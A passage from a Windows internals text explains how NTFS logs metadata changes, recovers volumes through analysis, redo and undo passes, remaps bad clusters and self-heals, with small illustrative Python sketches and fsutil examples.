have to do extra disk I/O to flush modifications to several different file system data structures because
changes to the data structures are recorded—in a single write operation—in the log file; if a fail-
ure occurs and cache contents are lost, the file system modifications can be recovered from the log.
Furthermore, unlike the FAT file system, NTFS guarantees that user data will be consistent and available
immediately after a write-through operation or a cache flush, even if the system subsequently fails.
Metadata logging
NTFS provides file system recoverability by using the same logging technique used by TxF, which consists
of recording all operations that modify file system metadata to a log file. Unlike TxF, however, NTFS’s
built-in file system recovery support doesn’t make use of CLFS but uses an internal logging implemen-
tation called the log file service (which is not a background service process as described in Chapter 10).
Another difference is that while TxF is used only when callers opt in for transacted operations, NTFS re-
cords all metadata changes so that the file system can be made consistent in the face of a system failure.
Log file service
The log file service (LFS) is a series of kernel-mode routines inside the NTFS driver that NTFS uses to
access the log file. NTFS passes the LFS a pointer to an open file object, which specifies a log file to be
accessed. The LFS either initializes a new log file or calls the Windows cache manager to access the ex-
isting log file through the cache, as shown in Figure 11-56. Note that although LFS and CLFS have similar
sounding names, they’re separate logging implementations used for different purposes, although their
operation is similar in many ways.
[Figure: the NTFS driver calls the log file service to log each transaction; the LFS reads, writes, and flushes the log file through the cache manager, which calls the memory manager to access the mapped file; the I/O manager writes the volume updates.]
FIGURE 11-56 Log file service (LFS).
The LFS divides the log file into two regions: a restart area and an “infinite” logging area, as shown in
Figure 11-57.
[Figure: the log file is divided into an LFS restart area, kept in two copies, followed by the logging area, which holds the log records.]
FIGURE 11-57 Log file regions.
NTFS calls the LFS to read and write the restart area. NTFS uses the restart area to store context in-
formation such as the location in the logging area at which NTFS begins to read during recovery after a
system failure. The LFS maintains a second copy of the restart data in case the first becomes corrupted
or otherwise inaccessible. The remainder of the log file is the logging area, which contains transaction
records NTFS writes to recover a volume in the event of a system failure. The LFS makes the log file ap-
pear infinite by reusing it circularly (while guaranteeing that it doesn’t overwrite information it needs).
Just like CLFS, the LFS uses LSNs to identify records written to the log file. As the LFS cycles through the
file, it increases the values of the LSNs. NTFS uses 64 bits to represent LSNs, so the number of possible
LSNs is so large as to be virtually infinite.
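The circular-reuse scheme can be illustrated with a toy Python model (the class and field names are invented for this sketch and are not the real LFS data structures):

```python
# Sketch: a circular log whose records are identified by monotonically
# increasing LSNs (64-bit in the real LFS), and which never overwrites
# a record it still needs.

class CircularLog:
    def __init__(self, capacity):
        self.capacity = capacity      # number of record slots in the file
        self.next_lsn = 0             # LSNs only ever increase
        self.records = {}             # slot index -> (lsn, payload)
        self.base_lsn = 0             # oldest LSN still needed

    def append(self, payload):
        slot = self.next_lsn % self.capacity
        # Refuse to overwrite a record that is still needed for recovery.
        old = self.records.get(slot)
        if old is not None and old[0] >= self.base_lsn:
            raise RuntimeError("log file full")
        lsn = self.next_lsn
        self.records[slot] = (lsn, payload)
        self.next_lsn += 1
        return lsn

    def advance_base(self, lsn):
        # "Set the beginning of the log file to a higher LSN."
        self.base_lsn = lsn

log = CircularLog(capacity=4)
lsns = [log.append(f"rec{i}") for i in range(4)]
log.advance_base(2)               # records below LSN 2 are no longer needed
wrapped = log.append("rec4")      # reuses slot 0, but the LSN keeps growing
```

Even after the file wraps, record identities (the LSNs) remain unique and ordered, which is what makes the file appear infinite to NTFS.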
NTFS never reads transactions from or writes transactions to the log file directly. The LFS provides
services that NTFS calls to open the log file, write log records, read log records in forward or backward
order, flush log records up to a specified LSN, or set the beginning of the log file to a higher LSN. During
recovery, NTFS calls the LFS to perform the same actions as described in the TxF recovery section: a redo
pass for nonflushed committed changes, followed by an undo pass for noncommitted changes.
Here’s how the system guarantees that the volume can be recovered:
1. NTFS first calls the LFS to record in the (cached) log file any transactions that will modify the volume structure.
2. NTFS modifies the volume (also in the cache).
3. The cache manager prompts the LFS to flush the log file to disk. (The LFS implements the flush by calling the cache manager back, telling it which pages of memory to flush. Refer back to the calling sequence shown in Figure 11-56.)
4. After the cache manager flushes the log file to disk, it flushes the volume changes (the metadata operations themselves) to disk.
These steps ensure that if the file system modifications are ultimately unsuccessful, the correspond-
ing transactions can be retrieved from the log file and can be either redone or undone as part of the
file system recovery procedure.
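The write-ahead ordering in these four steps can be sketched as a toy Python simulation (none of this is the real cache manager; the functions just model the flush ordering):

```python
# Sketch of write-ahead logging: the log record for a change always
# reaches "disk" before the change itself does.

log_cache, data_cache = [], []
log_disk, data_disk = [], []
events = []                       # order in which writes hit "disk"

def log_transaction(op):
    log_cache.append(op)          # step 1: record intent in the cached log

def modify_volume(op):
    data_cache.append(op)         # step 2: apply the change in the cache

def flush_log():
    for op in log_cache:          # step 3: the log reaches disk first
        log_disk.append(op)
        events.append(("log", op))
    log_cache.clear()

def flush_data():
    for op in data_cache:         # step 4: the metadata change follows
        data_disk.append(op)
        events.append(("data", op))
    data_cache.clear()

op = "set bits 3-9 in bitmap"
log_transaction(op)
modify_volume(op)
flush_log()
flush_data()
# The logged copy of the change became durable before the change itself:
wal_holds = events.index(("log", op)) < events.index(("data", op))
```

Because the log copy is durable first, a crash between steps 3 and 4 leaves enough information on disk to redo or undo the change.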
File system recovery begins automatically the first time the volume is used after the system is re-
booted. NTFS checks whether the transactions that were recorded in the log file before the crash were
applied to the volume, and if they weren’t, it redoes them. NTFS also guarantees that transactions not
completely logged before the crash are undone so that they don’t appear on the volume.
Log record types
The NTFS recovery mechanism uses similar log record types as the TxF recovery mechanism: update re-
cords, which correspond to the redo and undo records that TxF uses, and checkpoint records, which are
similar to the restart records used by TxF. Figure 11-58 shows three update records in the log file. Each
record represents one suboperation of a transaction, creating a new file. The redo entry in each update
record tells NTFS how to reapply the suboperation to the volume, and the undo entry tells NTFS how to
roll back (undo) the suboperation.
[Figure: three update records (T1a, T1b, T1c) in the logging area after the LFS restart area, each carrying a redo and an undo entry:
Redo: Allocate/initialize an MFT file record / Undo: Deallocate the file record
Redo: Set bits 3-9 in the bitmap / Undo: Clear bits 3-9 in the bitmap
Redo: Add the file name to the index / Undo: Remove the file name from the index]
FIGURE 11-58 Update records in the log file.
After logging a transaction (in this example, by calling the LFS to write the three update records to the
log file), NTFS performs the suboperations on the volume itself, in the cache. When it has finished updat-
ing the cache, NTFS writes another record to the log file, recording the entire transaction as complete—a
suboperation known as committing a transaction. Once a transaction is committed, NTFS guarantees that
the entire transaction will appear on the volume, even if the operating system subsequently fails.
When recovering after a system failure, NTFS reads through the log file and redoes each commit-
ted transaction. Although NTFS completed the committed transactions from before the system failure,
it doesn’t know whether the cache manager flushed the volume modifications to disk in time. The
updates might have been lost from the cache when the system failed. Therefore, NTFS executes the
committed transactions again just to be sure that the disk is up to date.
After redoing the committed transactions during a file system recovery, NTFS locates all the transac-
tions in the log file that weren’t committed at failure and rolls back each suboperation that had been
logged. In Figure 11-58, NTFS would first undo the T1c suboperation and then follow the backward
pointer to T1b and undo that suboperation. It would continue to follow the backward pointers, undoing
suboperations, until it reached the first suboperation in the transaction. By following the pointers, NTFS
knows how many and which update records it must undo to roll back a transaction.
Redo and undo information can be expressed either physically or logically. As the lowest layer of
software maintaining the file system structure, NTFS writes update records with physical descriptions that
specify volume updates in terms of particular byte ranges on the disk that are to be changed, moved,
and so on, unlike TxF, which uses logical descriptions that express updates in terms of operations such as
“delete file A.dat.” NTFS writes update records (usually several) for each of the following transactions:
■ Creating a file
■ Deleting a file
■ Extending a file
■ Truncating a file
■ Setting file information
■ Renaming a file
■ Changing the security applied to a file
The redo and undo information in an update record must be carefully designed because, while undoing a transaction, recovering from a system failure, or even operating normally, NTFS might try to redo a transaction that has already been done or, conversely, to undo a transaction that never occurred or that has already been undone. Similarly, NTFS might try to redo or undo a transaction consisting of
several update records, only some of which are complete on disk. The format of the update records
must ensure that executing redundant redo or undo operations is idempotent—that is, has a neutral ef-
fect. For example, setting a bit that is already set has no effect, but toggling a bit that has already been
toggled does. The file system must also handle intermediate volume states correctly.
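The idempotency requirement can be made concrete with a small Python sketch contrasting the bitmap operation from Figure 11-58 with a hypothetical non-idempotent "toggle" record:

```python
# Sketch: applying "set bits 3-9" twice leaves the bitmap unchanged
# (idempotent), while replaying a toggle would corrupt it.

bitmap = [0] * 16

def redo_set_bits(bm, lo, hi):
    for i in range(lo, hi + 1):   # idempotent: setting a set bit is a no-op
        bm[i] = 1

def redo_toggle_bits(bm, lo, hi):
    for i in range(lo, hi + 1):   # NOT idempotent: a replay flips it back
        bm[i] ^= 1

redo_set_bits(bitmap, 3, 9)
once = bitmap[:]
redo_set_bits(bitmap, 3, 9)       # replayed during recovery
idempotent_ok = bitmap == once

toggled = [0] * 16
redo_toggle_bits(toggled, 3, 9)
toggle_once = toggled[:]
redo_toggle_bits(toggled, 3, 9)   # a replay undoes the original operation
toggle_ok = toggled == toggle_once
```

A recovery pass that cannot tell whether a record was already applied must therefore log only operations like the first kind.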
In addition to update records, NTFS periodically writes a checkpoint record to the log file, as illus-
trated in Figure 11-59.
[Figure: log file records LSN 2058 through 2061 in the logging area; a checkpoint record among them is referenced by the NTFS restart data stored in the LFS restart area.]
FIGURE 11-59 Checkpoint record in the log file.
A checkpoint record helps NTFS determine what processing would be needed to recover a volume if
a crash were to occur immediately. Using information stored in the checkpoint record, NTFS knows, for
example, how far back in the log file it must go to begin its recovery. After writing a checkpoint record,
NTFS stores the LSN of the record in the restart area so that it can quickly find its most recently written
checkpoint record when it begins file system recovery after a crash occurs; this is similar to the restart
LSN used by TxF for the same reason.
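The role of the restart area in bounding the recovery scan can be sketched in Python (a toy model; the record layout and names are invented):

```python
# Sketch: the restart area remembers the LSN of the most recent
# checkpoint record so that recovery can seek to it directly instead of
# scanning the whole log.

log_records = []                  # (lsn, kind)
restart_area = {"checkpoint_lsn": None}

def write_record(lsn, kind):
    log_records.append((lsn, kind))

def write_checkpoint(lsn):
    write_record(lsn, "checkpoint")
    restart_area["checkpoint_lsn"] = lsn   # remembered for recovery

for lsn in range(2055, 2060):
    write_record(lsn, "update")
write_checkpoint(2060)
write_record(2061, "update")

# Recovery starts at the checkpoint, not at the start of the log:
start = restart_area["checkpoint_lsn"]
to_scan = [r for r in log_records if r[0] >= start]
```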
Although the LFS presents the log file to NTFS as if it were infinitely large, it isn’t. The generous size
of the log file and the frequent writing of checkpoint records (an operation that usually frees up space
in the log file) make the possibility of the log file filling up a remote one. Nevertheless, the LFS, just like
CLFS, accounts for this possibility by tracking several operational parameters:
■ The available log space
■ The amount of space needed to write an incoming log record and to undo the write, should that be necessary
■ The amount of space needed to roll back all active (noncommitted) transactions, should that be necessary
If the log file doesn’t contain enough available space to accommodate the total of the last two
items, the LFS returns a “log file full” error, and NTFS raises an exception. The NTFS exception handler
rolls back the current transaction and places it in a queue to be restarted later.
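The space check described above can be sketched as a single Python predicate (the sizes are arbitrary illustrative units, not real LFS accounting):

```python
# Sketch of LFS-style space accounting: admit a record only if the log
# can also hold its undo and the rollback of all active transactions.

def can_append(available, record_size, undo_size, active_undo_total):
    needed = record_size + undo_size + active_undo_total
    return available >= needed

available = 100   # assumed free log space, in illustrative units
ok = can_append(available, record_size=10, undo_size=10,
                active_undo_total=50)          # 70 <= 100: admitted
full = can_append(available, record_size=30, undo_size=30,
                  active_undo_total=60)        # 120 > 100: "log file full"
```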
To free up space in the log file, NTFS must momentarily prevent further transactions on files. To
do so, NTFS blocks file creation and deletion and then requests exclusive access to all system files and
shared access to all user files. Gradually, active transactions either are completed successfully or receive
the “log file full” exception. NTFS rolls back and queues the transactions that receive the exception.
Once it has blocked transaction activity on files as just described, NTFS calls the cache manager to
flush unwritten data to disk, including unwritten log file data. After everything is safely flushed to disk,
NTFS no longer needs the data in the log file. It resets the beginning of the log file to the current posi-
tion, making the log file “empty.” Then it restarts the queued transactions. Beyond the short pause in
I/O processing, the log file full error has no effect on executing programs.
This scenario is one example of how NTFS uses the log file not only for file system recovery but also for
error recovery during normal operation. You find out more about error recovery in the following section.
Recovery
NTFS automatically performs a disk recovery the first time a program accesses an NTFS volume after
the system has been booted. (If no recovery is needed, the process is trivial.) Recovery depends on two
tables NTFS maintains in memory: a transaction table, which behaves just like the one TxF maintains,
and a dirty page table, which records which pages in the cache contain modifications to the file system
structure that haven’t yet been written to disk. This data must be flushed to disk during recovery.
NTFS writes a checkpoint record to the log file once every 5 seconds. Just before it does, it calls
the LFS to store a current copy of the transaction table and of the dirty page table in the log file. NTFS
then records in the checkpoint record the LSNs of the log records containing the copied tables. When
recovery begins after a system failure, NTFS calls the LFS to locate the log records containing the most
recent checkpoint record and the most recent copies of the transaction and dirty page tables. It then
copies the tables to memory.
The log file usually contains more update records following the last checkpoint record. These
update records represent volume modifications that occurred after the last checkpoint record was
written. NTFS must update the transaction and dirty page tables to include these operations. After
updating the tables, NTFS uses the tables and the contents of the log file to update the volume itself.
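The two tables and their snapshot at checkpoint time can be sketched as a toy Python model (the structures and names are invented for illustration, not NTFS's internal layout):

```python
# Sketch: a transaction table of noncommitted transactions and a dirty
# page table of unflushed pages, both copied into the log at checkpoint.

import copy

transaction_table = {}            # txid -> LSN of its last update record
dirty_page_table = {}             # page -> LSN that first dirtied it
log = []                          # (lsn, record)

def log_update(lsn, txid, page):
    log.append((lsn, ("update", txid, page)))
    transaction_table[txid] = lsn
    dirty_page_table.setdefault(page, lsn)

def log_commit(lsn, txid):
    log.append((lsn, ("commit", txid)))
    transaction_table.pop(txid, None)     # committed: leave the table

def write_checkpoint(lsn):
    # Snapshot both tables into the log, then write the checkpoint record.
    log.append((lsn, ("tables", copy.deepcopy(transaction_table),
                      copy.deepcopy(dirty_page_table))))
    log.append((lsn + 1, ("checkpoint", lsn)))

log_update(100, "T1", "page7")
log_update(101, "T2", "page9")
log_commit(102, "T1")
write_checkpoint(103)

snapshot = log[-2][1]             # the tables record the checkpoint points at
```

After a crash, recovery reloads these snapshots and then replays the update records that follow them, exactly as the surrounding text describes.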
To perform its volume recovery, NTFS scans the log file three times, loading the file into memory
during the first pass to minimize disk I/O. Each pass has a particular purpose:
1. Analysis
2. Redoing transactions
3. Undoing transactions
Analysis pass
During the analysis pass, as shown in Figure 11-60, NTFS scans forward in the log file from the begin-
ning of the last checkpoint operation to find update records and use them to update the transaction
and dirty page tables it copied to memory. Notice in the figure that the checkpoint operation stores
three records in the log file and that update records might be interspersed among these records. NTFS
therefore must start its scan at the beginning of the checkpoint operation.
[Figure: the analysis pass scans forward from the beginning of the checkpoint operation to its end and beyond; the dirty page table, transaction table, and checkpoint record written by the checkpoint operation are interspersed with ordinary update records.]
FIGURE 11-60 Analysis pass.
Most update records that appear in the log file after the checkpoint operation begins represent a
modification to either the transaction table or the dirty page table. If an update record is a “transac-
tion committed” record, for example, the transaction the record represents must be removed from the
transaction table. Similarly, if the update record is a page update record that modifies a file system data
structure, the dirty page table must be updated to reflect that change.
Once the tables are up to date in memory, NTFS scans the tables to determine the LSN of the oldest
update record that logs an operation that hasn’t been carried out on disk. The transaction table con-
tains the LSNs of the noncommitted (incomplete) transactions, and the dirty page table contains the
LSNs of records in the cache that haven’t been flushed to disk. The LSN of the oldest update record that
NTFS finds in these two tables determines where the redo pass will begin. If the last checkpoint record
is older, however, NTFS will start the redo pass there instead.
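The choice of the redo starting point reduces to a minimum over the LSNs the analysis pass has collected, which can be sketched in Python (table contents are invented examples):

```python
# Sketch: the redo pass starts at the oldest LSN mentioned in the
# transaction table or the dirty page table, or at the last checkpoint
# if that is older still.

def redo_start_lsn(transaction_table, dirty_page_table, checkpoint_lsn):
    candidates = (list(transaction_table.values()) +
                  list(dirty_page_table.values()) +
                  [checkpoint_lsn])
    return min(candidates)

start = redo_start_lsn(
    transaction_table={"T2": 4049},      # noncommitted transactions
    dirty_page_table={"page7": 4040},    # unflushed cache pages
    checkpoint_lsn=4045,
)
```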
Note In the TxF recovery model, there is no distinct analysis pass. Instead, as described in
the TxF recovery section, TxF performs the equivalent work in the redo pass.
Redo pass
During the redo pass, as shown in Figure 11-61, NTFS scans forward in the log file from the LSN of the
oldest update record, which it found during the analysis pass. It looks for page update records, which
contain volume modifications that were written before the system failure but that might not have been
flushed to disk. NTFS redoes these updates in the cache.
[Figure: the redo pass scans forward from the oldest unwritten log record, which lies before the beginning of the checkpoint operation, past the interspersed update records, dirty page table, transaction table, and checkpoint record.]
FIGURE 11-61 Redo pass.
When NTFS reaches the end of the log file, it has updated the cache with the necessary volume modi-
fications, and the cache manager’s lazy writer can begin writing cache contents to disk in the background.
Undo pass
After it completes the redo pass, NTFS begins its undo pass, in which it rolls back any transactions that
weren’t committed when the system failed. Figure 11-62 shows two transactions in the log file; transac-
tion 1 was committed before the power failure, but transaction 2 wasn’t. NTFS must undo transaction 2.
[Figure: log records LSN 4044 through 4049. Transaction 1 ends with a "transaction committed" record written before the power failure; transaction 2 has no commit record, so the undo pass rolls it back.]
FIGURE 11-62 Undo pass.
Suppose that transaction 2 created a file, an operation that comprises three suboperations, each
with its own update record. The update records of a transaction are linked by backward pointers in the
log file because they aren’t usually contiguous.
The NTFS transaction table lists the LSN of the last-logged update record for each noncommitted
transaction. In this example, the transaction table identifies LSN 4049 as the last update record logged
for transaction 2. As shown from right to left in Figure 11-63, NTFS rolls back transaction 2.
[Figure: undoing transaction 2 from right to left across LSNs 4044-4049. Its update records hold the pairs Redo: Allocate/initialize an MFT file record / Undo: Deallocate the file record; Redo: Add the file name to the index / Undo: Remove the file name from the index; and Redo: Set bits 3-9 in the bitmap / Undo: Clear bits 3-9 in the bitmap.]
FIGURE 11-63 Undoing a transaction.
After locating LSN 4049, NTFS finds the undo information and executes it, clearing bits 3 through
9 in its allocation bitmap. NTFS then follows the backward pointer to LSN 4048, which directs it to
remove the new file name from the appropriate file name index. Finally, it follows the last backward
pointer and deallocates the MFT file record reserved for the file, as the update record with LSN 4046
specifies. Transaction 2 is now rolled back. If there are other noncommitted transactions to undo, NTFS
follows the same procedure to roll them back. Because undoing transactions affects the volume’s file
system structure, NTFS must log the undo operations in the log file. After all, the power might fail again
during the recovery, and NTFS would have to redo its undo operations.
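The backward-pointer walk can be sketched in Python, using the LSNs from the example above (the record layout is invented; only the chain-following logic is the point):

```python
# Sketch: rolling back transaction 2 by following backward pointers from
# its last-logged update record (LSN 4049) toward the oldest one.

records = {
    4046: {"undo": "deallocate the MFT file record", "prev": None},
    4048: {"undo": "remove the file name from the index", "prev": 4046},
    4049: {"undo": "clear bits 3-9 in the bitmap", "prev": 4048},
}

def rollback(last_lsn):
    undone = []
    lsn = last_lsn
    while lsn is not None:            # walk the chain newest -> oldest
        undone.append(records[lsn]["undo"])
        lsn = records[lsn]["prev"]
    return undone

undo_order = rollback(4049)           # transaction table supplies 4049
```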
When the undo pass of the recovery is finished, the volume has been restored to a consistent state.
At this point, NTFS is prepared to flush the cache changes to disk to ensure that the volume is up to
date. Before doing so, however, it executes a callback that TxF registers for notifications of LFS flushes.
Because TxF and NTFS both use write-ahead logging, TxF must flush its log through CLFS before the
NTFS log is flushed to ensure consistency of its own metadata. (And similarly, the TOPS file must be
flushed before the CLFS-managed log files.) NTFS then writes an “empty” LFS restart area to indicate
that the volume is consistent and that no recovery need be done if the system should fail again imme-
diately. Recovery is complete.
NTFS guarantees that recovery will return the volume to some preexisting consistent state, but not
necessarily to the state that existed just before the system crash. NTFS can’t make that guarantee be-
cause, for performance, it uses a lazy commit algorithm, which means that the log file isn’t immediately
flushed to disk each time a transaction committed record is written. Instead, numerous transaction
committed records are batched and written together, either when the cache manager calls the LFS to
flush the log file to disk or when the LFS writes a checkpoint record (once every 5 seconds) to the log
file. Another reason the recovered volume might not be completely up to date is that several paral-
lel transactions might be active when the system crashes, and some of their transaction committed
records might make it to disk, whereas others might not. The consistent volume that recovery produces
includes all the volume updates whose transaction committed records made it to disk and none of the
updates whose transaction committed records didn’t make it to disk.
NTFS uses the log file to recover a volume after the system fails, but it also takes advantage of an im-
portant freebie it gets from logging transactions. File systems necessarily contain a lot of code devoted
to recovering from file system errors that occur during the course of normal file I/O. Because NTFS logs
each transaction that modifies the volume structure, it can use the log file to recover when a file system
error occurs and thus can greatly simplify its error handling code. The log file full error described earlier
is one example of using the log file for error recovery.
Most I/O errors that a program receives aren’t file system errors and therefore can’t be resolved
entirely by NTFS. When called to create a file, for example, NTFS might begin by creating a file record in
the MFT and then enter the new file’s name in a directory index. When it tries to allocate space for the
file in its bitmap, however, it could discover that the disk is full and the create request can’t be com-
pleted. In such a case, NTFS uses the information in the log file to undo the part of the operation it has
already completed and to deallocate the data structures it reserved for the file. Then it returns a disk
full error to the caller, which in turn must respond appropriately to the error.
NTFS bad-cluster recovery
The volume manager included with Windows (VolMgr) can recover data from a bad sector on a
fault-tolerant volume, but if the hard disk doesn’t perform bad-sector remapping or runs out of spare
sectors, the volume manager can’t perform bad-sector replacement to replace the bad sector. When
the file system reads from the sector, the volume manager instead recovers the data and returns the
warning to the file system that there is only one copy of the data.
The FAT file system doesn’t respond to this volume manager warning. Moreover, neither FAT nor the
volume manager keeps track of the bad sectors, so a user must run the Chkdsk or Format utility to pre-
vent the volume manager from repeatedly recovering data for the file system. Both Chkdsk and Format
are less than ideal for removing bad sectors from use. Chkdsk can take a long time to find and remove
bad sectors, and Format wipes all the data off the partition it’s formatting.
In the file system equivalent of a volume manager’s bad-sector replacement, NTFS dynamically re-
places the cluster containing a bad sector and keeps track of the bad cluster so that it won’t be reused.
(Recall that NTFS maintains portability by addressing logical clusters rather than physical sectors.) NTFS
performs these functions when the volume manager can’t perform bad-sector replacement. When a
volume manager returns a bad-sector warning or when the hard disk driver returns a bad-sector error,
NTFS allocates a new cluster to replace the one containing the bad sector. NTFS copies the data that
the volume manager has recovered into the new cluster to reestablish data redundancy.
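The remapping step can be sketched in Python using the cluster numbers from Figures 11-64 and 11-65 (the dictionary stands in for the file's run list; the function names are invented):

```python
# Sketch of bad-cluster remapping: repoint the VCN that mapped to the
# bad LCN at a freshly allocated cluster, and give the bad LCN to the
# bad-cluster file so it is never reused.

vcn_to_lcn = {0: 1355, 1: 1356, 2: 1357, 3: 1588, 4: 1589, 5: 1590}
bad_cluster_file = set()

def remap_bad_cluster(mapping, bad_lcn, new_lcn):
    bad_cluster_file.add(bad_lcn)         # retire the bad cluster
    for vcn, lcn in mapping.items():
        if lcn == bad_lcn:
            mapping[vcn] = new_lcn        # repoint the VCN
    # the recovered data (if any) would now be rewritten into new_lcn

remap_bad_cluster(vcn_to_lcn, bad_lcn=1357, new_lcn=1049)
```

The file's VCNs are untouched; only the VCN-to-LCN translation changes, which is why the remapping is invisible to applications.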
Figure 11-64 shows an MFT record for a user file with a bad cluster in one of its data runs as it existed
before the cluster went bad. When it receives a bad-sector error, NTFS reassigns the cluster containing
the sector to its bad-cluster file, $BadClus. This prevents the bad cluster from being allocated to another file. NTFS then allocates a new cluster for the file and changes the file’s VCN-to-LCN mappings to
point to the new cluster. This bad-cluster remapping (introduced earlier in this chapter) is illustrated in
Figure 11-64. Cluster number 1357, which contains the bad sector, must be replaced by a good cluster.
[Figure: the MFT record for a user file (standard information, file name, and data attributes) with two data runs: starting VCN 0 at LCN 1355 for 3 clusters (VCNs 0-2 at LCNs 1355-1357) and starting VCN 3 at LCN 1588 for 3 clusters (VCNs 3-5 at LCNs 1588-1590). Cluster 1357 contains the bad sector.]
FIGURE 11-64 MFT record for a user file with a bad cluster.
Bad-sector errors are undesirable, but when they do occur, the combination of NTFS and the
volume manager provides the best possible solution. If the bad sector is on a redundant volume,
the volume manager recovers the data and replaces the sector if it can. If it can’t replace the sector,
it returns a warning to NTFS, and NTFS replaces the cluster containing the bad sector.
If the volume isn’t configured as a redundant volume, the data in the bad sector can’t be recovered.
When the volume is formatted as a FAT volume and the volume manager can’t recover the data, read-
ing from the bad sector yields indeterminate results. If some of the file system’s control structures re-
side in the bad sector, an entire file or group of files (or potentially, the whole disk) can be lost. At best,
some data in the affected file (often, all the data in the file beyond the bad sector) is lost. Moreover, the
FAT file system is likely to reallocate the bad sector to the same or another file on the volume, causing
the problem to resurface.
Like the other file systems, NTFS can’t recover data from a bad sector without help from a volume
manager. However, NTFS greatly contains the damage a bad sector can cause. If NTFS discovers the
bad sector during a read operation, it remaps the cluster the sector is in, as shown in Figure 11-65. If the
volume isn’t configured as a redundant volume, NTFS returns a data read error to the calling program.
Although the data that was in that cluster is lost, the rest of the file—and the file system—remains
intact; the calling program can respond appropriately to the data loss, and the bad cluster won’t be
reused in future allocations. If NTFS discovers the bad cluster on a write operation rather than a read,
NTFS remaps the cluster before writing and thus loses no data and generates no error.
The same recovery procedures are followed if file system data is stored in a sector that goes bad.
If the bad sector is on a redundant volume, NTFS replaces the cluster dynamically, using the data
recovered by the volume manager. If the volume isn’t redundant, the data can’t be recovered, so NTFS
sets a bit in the $Volume metadata file that indicates corruption on the volume. The NTFS Chkdsk utility
checks this bit when the system is next rebooted, and if the bit is set, Chkdsk executes, repairing the file
system corruption by reconstructing the NTFS metadata.
[Figure: after remapping, the bad-cluster file’s $Bad alternate data stream maps VCN 0 to LCN 1357 (1 cluster), while the user file’s $Data runs become: starting VCN 0 at LCN 1355 for 2 clusters (VCNs 0-1 at LCNs 1355-1356), starting VCN 2 at LCN 1049 for 1 cluster, and starting VCN 3 at LCN 1588 for 3 clusters (VCNs 3-5 at LCNs 1588-1590).]
FIGURE 11-65 Bad-cluster remapping.
In rare instances, file system corruption can occur even on a fault-tolerant disk configuration. A
double error can destroy both file system data and the means to reconstruct it. If the system crashes
while NTFS is writing the mirror copy of an MFT file record—of a file name index or of the log file, for
example—the mirror copy of such file system data might not be fully updated. If the system were re-
booted and a bad-sector error occurred on the primary disk at exactly the same location as the incom-
plete write on the disk mirror, NTFS would be unable to recover the correct data from the disk mirror.
NTFS implements a special scheme for detecting such corruptions in file system data. If it ever finds an
inconsistency, it sets the corruption bit in the volume file, which causes Chkdsk to reconstruct the NTFS
metadata when the system is next rebooted. Because file system corruption is rare on a fault-tolerant
disk configuration, Chkdsk is seldom needed. It is supplied as a safety precaution rather than as a first-
line data recovery strategy.
The use of Chkdsk on NTFS is vastly different from its use on the FAT file system. Before writing
anything to disk, FAT sets the volume’s dirty bit and then resets the bit after the modification is com-
plete. If any I/O operation is in progress when the system crashes, the dirty bit is left set and Chkdsk
runs when the system is rebooted. On NTFS, Chkdsk runs only when unexpected or unreadable file
system data is found, and NTFS can’t recover the data from a redundant volume or from redundant
file system structures on a single volume. (The system boot sector is duplicated—in the last sector
of a volume—as are the parts of the MFT ($MftMirr) required for booting the system and running
the NTFS recovery procedure. This redundancy ensures that NTFS will always be able to boot and
recover itself.)
Table 11-11 summarizes what happens when a sector goes bad on a disk volume formatted for one of
the Windows-supported file systems according to various conditions we’ve described in this section.
TABLE 11-11 Summary of NTFS data recovery scenarios

Scenario: Fault-tolerant volume¹
  With a disk that supports bad-sector remapping and has spare sectors:
    1. Volume manager recovers the data.
    2. Volume manager performs bad-sector replacement.
    3. File system remains unaware of the error.
  With a disk that does not perform bad-sector remapping or has no spare sectors:
    1. Volume manager recovers the data.
    2. Volume manager sends the data and a bad-sector error to the file system.
    3. NTFS performs cluster remapping.

Scenario: Non-fault-tolerant volume
  With a disk that supports bad-sector remapping and has spare sectors:
    1. Volume manager can’t recover the data.
    2. Volume manager sends a bad-sector error to the file system.
    3. NTFS performs cluster remapping. Data is lost.²
  With a disk that does not perform bad-sector remapping or has no spare sectors:
    1. Volume manager can’t recover the data.
    2. Volume manager sends a bad-sector error to the file system.
    3. NTFS performs cluster remapping. Data is lost.²

¹ A fault-tolerant volume is one of the following: a mirror set (RAID-1) or a RAID-5 set.
² In a write operation, no data is lost: NTFS remaps the cluster before the write.
If the volume on which the bad sector appears is a fault-tolerant volume—a mirrored (RAID-1) or
RAID-5 / RAID-6 volume—and if the hard disk is one that supports bad-sector replacement (and that
hasn’t run out of spare sectors), it doesn’t matter which file system you’re using (FAT or NTFS). The vol-
ume manager replaces the bad sector without the need for user or file system intervention.
If a bad sector is located on a hard disk that doesn’t support bad sector replacement, the file system
is responsible for replacing (remapping) the bad sector or—in the case of NTFS—the cluster in which
the bad sector resides. The FAT file system doesn’t provide sector or cluster remapping. The benefits of
NTFS cluster remapping are that bad spots in a file can be fixed without harm to the file (or harm to the
file system, as the case may be) and that the bad cluster will never be used again.
Self-healing
With today’s multiterabyte storage devices, taking a volume offline for a consistency check can result in
a service outage of many hours. Recognizing that many disk corruptions are localized to a single file or
portion of metadata, NTFS implements a self-healing feature to repair damage while a volume remains
online. When NTFS detects corruption, it prevents access to the damaged file or files and creates a
system worker thread that performs Chkdsk-like corrections to the corrupted data structures, allow-
ing access to the repaired files when it has finished. Access to other files continues normally during this
operation, minimizing service disruption.
You can use the fsutil repair set command to view and set a volume’s repair options, which are
summarized in Table 11-12. The Fsutil utility uses the FSCTL_SET_REPAIR file system control code to set
these settings, which are saved in the VCB for the volume.
TABLE 11-12 NTFS self-healing behaviors

Flag: SET_REPAIR_ENABLED
  Behavior: Enable self-healing for the volume.

Flag: SET_REPAIR_WARN_ABOUT_DATA_LOSS
  Behavior: If the self-healing process is unable to fully recover a file, specifies whether the user should be visually warned.

Flag: SET_REPAIR_DISABLED_AND_BUGCHECK_ON_CORRUPTION
  Behavior: If the NtfsBugCheckOnCorrupt NTFS registry value was set by using fsutil behavior set NtfsBugCheckOnCorrupt 1 and this flag is set, the system will crash with a STOP error 0x24, indicating file system corruption. This setting is automatically cleared during boot time to avoid repeated reboot cycles.
In all cases, including when the visual warning is disabled (the default), NTFS will log any self-healing
operation it undertook in the System event log.
Apart from periodic automatic self-healing, NTFS also supports manually initiated self-healing
cycles (this type of self-healing is called proactive) through the FSCTL_INITIATE_REPAIR and FSCTL_
WAIT_FOR_REPAIR control codes, which can be initiated with the fsutil repair initiate and fsutil
repair wait commands. This allows the user to force the repair of a specific file and to wait until repair
of that file is complete.
To check the status of the self-healing mechanism, the FSCTL_QUERY_REPAIR control code or the
fsutil repair query command can be used, as shown here:
C:\>fsutil repair query c:
